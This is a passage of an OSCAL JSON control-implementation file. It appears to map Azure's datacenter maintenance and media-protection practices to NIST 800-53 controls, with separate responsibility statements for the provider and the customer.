statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7184a2fb-6ff8-412f-b5bd-b18f7ce7cb34","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-3.3","statements":[{"uuid":"c810bfa4-7830-4826-8d44-4ec09ee6bf86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-018"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.3_smt.a","by-components":[{"uuid":"5079c013-2414-49b6-9a8b-12e16f9190aa","export":{"provided":[{"uuid":"ebafe00f-462a-4566-8b2e-60e729f45d8b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-018"}],"description":"Maintenance tools are datacenter specific and are not removed and are retained within the facility. Each facility contains a restricted physical lock box or storage room that stores maintenance tools, such as fluke ether scopes, fluke fiber channel testers, Ethernet toners, etc. Access is controlled to the lock box or storage room in DCAT to prohibit unauthorized access to the maintenance tools._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"aad04b84-c4e5-40ec-baeb-b2f0f16856a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-019"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.3_smt.b","by-components":[{"uuid":"b57ce558-fc86-4c09-b3df-529b7d839677","export":{"provided":[{"uuid":"71bb15fc-3f29-4d65-a403-c9f2e827099f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-019"}],"description":"Maintenance tools are datacenter specific and are not removed and are retained within the facility. Each facility contains a restricted physical lock box or storage room that stores maintenance tools, such as fluke ether scopes, fluke fiber channel testers, Ethernet toners, etc. Access is controlled to the lock box or storage room in DCAT to prohibit unauthorized access to the maintenance tools._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"5194225d-51c8-441b-8dbc-85d0341d0cb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.3_smt.c","by-components":[{"uuid":"9bb3d86b-bc1d-496e-976e-aa4461a37aad","export":{"provided":[{"uuid":"0a41c9f8-5c69-40f0-93c5-19e200304d86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-020"}],"description":"Maintenance tools are datacenter specific and are not removed and are retained within the facility. Each facility contains a restricted physical lock box or storage room that stores maintenance tools, such as fluke ether scopes, fluke fiber channel testers, Ethernet toners, etc. Access is controlled to the lock box or storage room in DCAT to prohibit unauthorized access to the maintenance tools._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"9954c60c-d7c3-46d3-abc9-19adaad8f2f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-021"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.3_smt.d","by-components":[{"uuid":"5d2d9aa0-e436-40fe-96a0-43dabdddad6b","export":{"provided":[{"uuid":"3d0ac092-0bf0-48b6-94d8-48dfaa7504dd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-021"}],"description":"Maintenance tools are datacenter specific and are not removed and are retained within the facility. Each facility contains a restricted physical lock box or storage room that stores maintenance tools, such as fluke ether scopes, fluke fiber channel testers, Ethernet toners, etc. Access is controlled to the lock box or storage room in DCAT to prohibit unauthorized access to the maintenance tools._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"857e461e-cde5-42ea-8213-17b1f4554429","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-4","statements":[{"uuid":"d5b0252a-d070-4c28-9bb3-eb3483b51dc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.a","by-components":[{"uuid":"6d818d38-f1d1-469e-8735-d1147b0767a2","export":{"provided":[{"uuid":"49504f70-603d-427b-a41a-f0a7a68e65eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-022"}],"description":"All access, including that for nonlocal maintenance, is approved per procedures via OneIdentity and JIT and changes are approved through the procedures. Azure adheres to the Microsoft Security Development Lifecycle (SDL) process, which requires all development teams to utilize standard approved tools and their associated security checks._x000D_ _x000D_ Azure authorizes, monitors, and controls nonlocal maintenance and diagnostic activities within the Azure managed network. All nonlocal network maintenance is performed via the change management process, which includes the approval of time-bound JIT requests specific to service team groups and the monitoring of actions taken at the asset and service level through the audit logging and monitoring pipeline._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cf4bf317-d7ee-46bd-ab82-7a466558b7ce","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-022"}],"description":"The customer is responsible for approving and monitoring of non-local maintenance and diagnostic activities on customer-deployed operating systems.","provided-uuid":"49504f70-603d-427b-a41a-f0a7a68e65eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"90f4ccc0-dfa2-4fe2-ba7d-7cd5cf5e92ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.b","by-components":[{"uuid":"eb4918dd-47e9-4245-b7bc-5a3bda75d92b","export":{"provided":[{"uuid":"d75e37e9-15ff-45ea-8112-651924bf629c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-023"}],"description":"Nonlocal maintenance may be performed by authorized Azure personnel. Use of nonlocal maintenance and diagnostics tools are allowed within the Azure environment as long as the use is consistent with the configuration management processes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8dfbeb6a-238e-46cd-bd62-ce7375197fa9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-023"}],"description":"The customer is responsible for using maintenance and diagnostic tools that are consistent with organizational policy and documented in the security plan when performing non-local maintenance on customer-deployed operating systems.","provided-uuid":"d75e37e9-15ff-45ea-8112-651924bf629c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"65386863-79c4-4662-98b0-9061fe48befe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.c","by-components":[{"uuid":"1ae56da9-a648-48e6-858e-cdd1144ae90d","export":{"provided":[{"uuid":"1cfba89d-3879-43d1-a49b-00f35ac3ea65","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-024"}],"description":"Azure enforces strong identification and authentication controls in conducting nonlocal maintenance and diagnostic activities. Authentication is handled by AD using Thales smart cards._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9096670f-f9b1-4fac-a06d-2770696fdf05","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-024"}],"description":"The customer is responsible for using strong authenticators when establishing non-local maintenance and diagnostic sessions on customer-deployed operating systems.","provided-uuid":"1cfba89d-3879-43d1-a49b-00f35ac3ea65"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d0205af3-2b64-43b1-ac51-42a01b80f59c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.d","by-components":[{"uuid":"c79f9cb2-9ec3-4656-92eb-7684476c7624","export":{"provided":[{"uuid":"277d711a-c33c-45c6-ac07-99fc5dc446e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-025"}],"description":"Auditing of maintenance and diagnostics within the Azure environment are performed via Azure DevOps and as part of the JIT elevation process. All nonlocal network maintenance must be documented in work tickets. Maintenance and diagnostic activities are logged in relevant logging and monitoring tool logs._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5b2fad35-1b5b-4230-b935-76e67ea634b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-025"}],"description":"The customer is responsible for maintaining records for non-local maintenance and diagnostic activities on customer-deployed operating systems.","provided-uuid":"277d711a-c33c-45c6-ac07-99fc5dc446e7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"642b051a-a970-4f75-8546-32e1a9f1da70","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.e","by-components":[{"uuid":"fc950a01-5ab9-47a4-89b2-8d41c7a785be","export":{"provided":[{"uuid":"7372c48e-6f59-4625-83e2-89c9edfbbe71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-026"}],"description":"Nonlocal sessions are terminated after the JIT elevation period expires. Nonlocal maintenance is performed via RDGWs, SSH, and SSL VPNs which enforce a network disconnect and allow users to terminate connections at the completion of the work._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0fcd83c0-77ac-44d5-b15c-114427d6b77f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-026"}],"description":"The customer is responsible for terminating session and network connections when non-local maintenance is completed on customer-deployed operating systems.","provided-uuid":"7372c48e-6f59-4625-83e2-89c9edfbbe71"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"78a7914d-e2dc-42b0-8606-1f2795214217","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-4.3","statements":[{"uuid":"9ce1a751-8b9e-4a65-8196-6960ad20d87c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4.3_smt.a","by-components":[{"uuid":"c791ca2b-827b-417f-8d7c-1f6089c7ff5a","export":{"provided":[{"uuid":"b5c98cf1-5937-45f9-8a44-232ecc9a536b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-027"}],"description":"Remote maintenance and diagnostic services are performed by first logging in via RDP to a Jumpbox, Debug Server, or Network Hop Box from a Secure Administrative Workstation (SAW) machine on Microsoft CorpNet, and then initiating a second RDP session from the interim device to the destination target asset. No direct connection is possible from workstations to the destination asset. TLS 1.2 is used to protect RDP connections._x000D_ _x000D_ Azure requires strong identification and authentication for nonlocal maintenance and diagnostic sessions. Azure uses combinations of elevated access accounts and smart cards to access assets. When nonlocal maintenance is completed via RDGW or SSH or SSL VPN, the session is terminated by the user or is disconnected after fifteen (15) minutes of inactivity the information system._x000D_ _x000D_ All nonlocal network maintenance and diagnostic sessions are managed through configuration management process. Changes must be approved and documented in work tickets. Before changes are automatically deployed in the production environment there is a required quality control step that requires peer review of the proposed change, and a safe deployment process during deployment. After changes are implemented, there is a quality control process to review success criteria against logged work tickets from the past month._x000D_ _x000D_"}],"responsibilities":[{"uuid":"63f0cb17-2897-4e7d-86a5-57b2075014c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-027"}],"description":"The customer is responsible for performing all non-local maintenance of customer-deployed operating systems from an information system that has comparable security.","provided-uuid":"b5c98cf1-5937-45f9-8a44-232ecc9a536b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dd40561e-5a13-4f25-95f8-4bb54abfd3cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4.3_smt.b","by-components":[{"uuid":"83d267d1-ca9e-48ea-a9dd-1f41efca511b","export":{"provided":[{"uuid":"6f44bf6f-6aef-4871-91ec-d393708feacf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-028"}],"description":"Physical components within the Azure environment are not removed from the Azure datacenter for nonlocal maintenance. Digital media does not leave the secure physical Azure boundary of the colocation unless it is being taken for physical destruction by shredding onsite._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"3b929290-14e2-4fa1-9893-b3867c996485","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-5","statements":[{"uuid":"a831fd68-ad90-4b02-83d9-18c2da61f3c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-029"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-5_smt.a","by-components":[{"uuid":"61477c1a-23bc-41ed-995f-45626f1b0659","export":{"provided":[{"uuid":"93dff724-b9ef-4c52-899c-7cd133e26f1d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-029"}],"description":"Maintenance personnel authorization at Azure datacenters is managed through the DCAT system. All FTEs and vendors' physical access to the datacenters is managed through DCAT. Logical access (any nonlocal maintenance) is managed through the CM process and access is documented, provisioned, and approved._x000D_ _x000D_ All maintenance work requires an associated work ticket. In order to physically access the datacenter to perform maintenance, the person must be approved by the Datacenter Management (DCM) team via a DCAT request. When arriving at the datacenter, a person's identity is matched against their approved DCAT request. The DCAT tool manages the areas that maintenance personnel can access. The principle of least privilege is used in granting access. Azure datacenters have resident maintenance teams called Site Services and Critical Environment (CE) teams. On a quarterly basis, the datacenter management team and physical security teams perform audits of the DCAT access list to keep the access list of maintenance personnel current. Personnel terminations or transfers are reflected immediately through a manual update of the access list._x000D_ _x000D_"}],"responsibilities":[{"uuid":"6f7bbe53-e3ef-42f5-a94f-231bf9cf6152","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-029"}],"description":"The customer is responsible for authorizing remote maintenance personnel and maintaining a list of authorized remote maintenance organizations/personnel.","provided-uuid":"93dff724-b9ef-4c52-899c-7cd133e26f1d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bb3cdf96-d817-43ff-bae5-fdc07fdb1618","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-030"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-5_smt.b","by-components":[{"uuid":"a5c8c519-cd32-46ff-ba3d-fe688365b91c","export":{"provided":[{"uuid":"0e8ce9d0-041f-4305-af18-e429cbd9ec47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-030"}],"description":"Maintenance personnel have their physical access authorizations managed in the DCAT system. Site Services and CE teams have certification requirements or equivalent tenure and training that ensure their team members are knowledgeable in supporting their respective datacenter environments._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e548170d-2477-4e58-87a0-03f09d586633","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-030"}],"description":"The customer is responsible for managing maintenance personnel, ensuring that non-escorted personnel performing maintenance on customer-deployed operating systems have the required access authorizations.","provided-uuid":"0e8ce9d0-041f-4305-af18-e429cbd9ec47"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"88caa873-f607-41e6-be0a-2e2197847e50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-5_smt.c","by-components":[{"uuid":"5104e372-d737-4a4f-b5c1-0a87c020e580","export":{"provided":[{"uuid":"fdec1fdf-0293-4b28-bc69-652918f48c99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-031"}],"description":"Maintenance personnel with the appropriate technical competence and access authorizations escort any vendor that is required to perform maintenance on the system._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c69f90a2-fd24-41fd-8160-378446d06d64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-031"}],"description":"The customer is responsible for managing maintenance personnel and designating organizational personnel with required access authorizations and technical competence to supervise the maintenance activities of personnel who do not possess the required access authorizations.","provided-uuid":"fdec1fdf-0293-4b28-bc69-652918f48c99"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2db8bbb9-cee3-4cb4-9290-e15603527fca","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-5.1","statements":[{"uuid":"662340b9-8c05-43ec-9e10-54733fa3d9de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-033"}],"statement-id":"ma-5.1_smt.a","by-components":[{"uuid":"e7966af1-01c3-4c4a-83de-116b30b67079","export":{"provided":[{"uuid":"7116ee53-bc10-44e8-b9a1-716e004c997e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-032"}],"description":"All visitors to datacenters who must gain physical access to perform maintenance must be approved by the Datacenter Management (DCM) team for access through a DCAT request . When arriving at the datacenter, a person's identity is matched against their approved DCAT request. Additionally, visitors that do not have appropriate access approvals, such as maintenance vendors, are escorted by someone who possesses the technical competence and appropriate clearances and access to supervise the work they are performing."},{"uuid":"77019e3c-fbc5-49e1-8c0d-26be4b050b95","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-033"}],"description":"All visitors to datacenters who must gain physical access to perform maintenance must be approved by the Datacenter Management (DCM) team for access through a DCAT request . When arriving at the datacenter, a person's identity is matched against their approved DCAT request. Additionally, visitors that do not have appropriate access approvals, such as maintenance vendors, are escorted by someone who possesses the technical competence and appropriate clearances and access to supervise the work they are performing. Visitors without access approvals or clearances are not permitted logical access to system assets."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"8b8e36d3-c7f3-4d7c-9dde-ddfa7d237633","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-034"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-5.1_smt.b","by-components":[{"uuid":"c615c02d-f765-4332-9e66-03d752667e3b","export":{"provided":[{"uuid":"ff7cf449-3eb9-4161-9970-2010c356ffd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-034"}],"description":"If a data-bearing device (DBD) cannot be sanitized prior to necessary maintenance, it is destroyed to ensure the confidentiality of customer data."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"ead5ce28-dfd1-4dce-abee-d0cfcf62a325","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-6","statements":[{"uuid":"32ab6404-7515-43da-8b4d-a4f86884e079","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-035"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-6_smt","by-components":[{"uuid":"675c1909-8972-4527-938b-5de9de83d8f6","export":{"provided":[{"uuid":"1705cb99-fed8-46d1-a875-cd10ea23dbe9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-035"}],"description":"Azure datacenters maintain resident maintenance personnel as part of the Critical Environment (CE) team to support critical datacenter infrastructure systems as well as personnel as part of the Site Services team to support datacenter operations. The CE and Site Services teams have identified critical security and technology system components which they maintain spares for onsite. Critical systems are designed in N+1 configurations and services are designed to be resilient. This allows the datacenter management team to meet recovery goals in the event of a service interruption or contingency plan situation. Critical information system services are provisioned from more than one datacenter to prevent an interruption in service due to an incident at one of the datacenters. Services are responsible for deploying to multiple datacenters to provide for redundancy and resiliency."}],"responsibilities":[{"uuid":"644b7fa1-8045-446a-aa8d-e512f499da2a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-035"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for timely maintenance support of customer-deployed operating systems.","provided-uuid":"1705cb99-fed8-46d1-a875-cd10ea23dbe9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"933be29e-9e1f-4856-b7bf-05596591ea65","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-2","statements":[{"uuid":"6ff0b085-55c3-4ac2-9153-f7dfc13325b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-2_smt","by-components":[{"uuid":"9990c27b-2a58-4423-ad06-c1a45c4fd729","export":{"provided":[{"uuid":"56b0b14c-da58-4109-90ec-d9399cdf6940","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-006"}],"description":"Azure has implemented media access through the implementation of the Microsoft Security Program Policy (MSPP). Logical access to digital media is controlled via Active Directory Group Policy Objects (AD GPOs) and security groups in OneIdentity. Physical access to all media is restricted by the datacenter access process. Access is restricted to individuals who have a legitimate business purpose for accessing the data. The Asset Protection Standard defines the safeguards required to protect the confidentiality, integrity, and availability of information assets within Azure datacenters . Azure considers digital media for this control to be the server and network device assets secured at Azure datacenters . Non-digital media is not used for storage of Azure information._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"6720563a-00b9-49ef-b4c2-6c46f1928320","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-3","statements":[{"uuid":"4c20db06-8c70-4d9a-9f15-dc46a5da88d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-3_smt.a","by-components":[{"uuid":"830b29fe-6592-4a63-9ce4-de107d86b376","export":{"provided":[{"uuid":"314b43dd-fc62-4bac-a388-d553b1cb887f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-007"}],"description":"Assets within Azure datacenters are classified with a High, Moderate, or Low Business Impact (HBI, MBI, LBI) designation which requires different levels of security and handling precautions. Asset owners are required to classify their assets. HBI assets are secured in a rack with small, red placard labeled HBI on the door of the rack. _x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"74e0ef05-97a3-473b-9df5-99575e2a0fff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-3_smt.b","by-components":[{"uuid":"81ae8b2e-aef2-46d6-8710-fc798315ade3","export":{"provided":[{"uuid":"8c3bbac4-80dc-4c37-aa12-6cb191d483b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-008"}],"description":"Asset owners are required to assign their assets an asset classification and no assets are exempt from this requirement. In the Azure datacenter environment, assets refer to servers, network devices, and magnetic tapes. Non-digital media is not used in the datacenters._x000D_ _x000D_ Azure implements maintenance tools control by creating an access level within the Datacenter Access Tool (DCAT). Each facility contains a restricted physical lock box or access-controlled room for the storage of specialized maintenance tools, such as fluke ether scopes, fluke fiber channel testers, Ethernet toners, and USBs. Access is controlled to the lock box or storage room using the DCAT tool to prohibit unauthorized access to the maintenance tools. This ensures that only personnel with approved access can access the tools._x000D_ _x000D_ Third-party maintenance personnel may provide their own calibrated tools or assets where necessary. The same access controls in DCAT that limit access to the on-site tooling are also in place for all work areas where Critical Environment (CE) assets are present. Azure limits where any personnel can go and what doors they can open. To access the work site, they must follow CE procedural requirements._x000D_ _x000D_ The Site Services team performs routine 